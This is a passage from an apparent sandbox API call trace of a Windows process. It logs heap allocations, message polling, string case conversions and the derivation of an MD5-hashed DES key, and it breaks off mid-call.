RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0200.549] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0200.549] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0200.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0200.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0200.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0200.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0200.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0200.549] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0200.549] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0200.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0200.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0200.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0200.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0200.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0200.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0200.550] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0200.550] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0200.550] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0200.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0200.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0200.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0200.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0200.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0200.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0200.550] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0200.550] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0200.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0200.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0200.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0200.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0200.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0200.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0200.551] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0200.551] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0200.551] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0200.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0200.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0200.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0200.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0200.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0200.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0200.551] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0200.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0200.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0200.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0200.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0200.551] CryptCreateHash (in: hProv=0xad63f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0200.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0200.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0200.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0200.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0200.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0200.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0200.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0200.552] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0200.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0200.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0200.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0200.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0200.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0200.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0200.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0200.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0200.552] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.552] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0200.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0200.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0200.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0200.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0200.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0200.553] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0200.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0200.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0200.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0200.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0200.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0200.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0200.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0200.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0200.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0200.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0200.553] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0200.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0200.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0200.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0200.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0200.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0200.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0200.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0200.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0200.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0200.556] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0200.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0200.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0200.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0200.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0200.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0200.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0200.557] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0200.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0200.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0200.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0200.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0200.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0200.557] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0200.557] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0200.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0200.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0200.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0200.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0200.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0200.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0200.558] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0200.558] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0200.558] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0200.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0200.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0200.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0200.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0200.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0200.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0200.558] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0200.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0200.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0200.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0200.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0200.558] CryptHashData (hHash=0xaa5860, pbData=0x24b18f8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0200.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0200.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0200.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0200.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0200.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0200.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0200.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0200.559] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0200.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0200.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0200.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0200.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0200.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0200.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0200.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0200.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0200.559] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.559] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0200.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0200.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0200.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0200.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0200.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0200.560] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0200.560] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0200.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0200.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0200.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0200.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0200.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0200.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0200.560] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0200.560] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0200.560] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0200.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0200.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0200.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0200.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0200.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0200.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0200.560] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0200.560] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0200.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0200.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0200.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0200.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0200.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0200.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0200.561] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0200.561] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0200.561] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0200.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0200.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0200.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0200.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0200.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0200.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0200.561] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0200.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0200.561] CryptDeriveKey (in: hProv=0xad63f8, Algid=0x6601, hBaseData=0xaa5860, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa58a0) returned 1 [0200.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0200.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0200.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0200.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0200.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0200.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0200.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0200.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0200.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0200.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0200.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0200.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0200.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0200.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0200.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0200.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0200.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0200.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0200.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0200.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0200.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0200.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0200.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0200.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0200.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0200.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0200.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0200.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0200.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0200.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0200.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0200.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0200.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0200.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0200.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0200.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0200.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 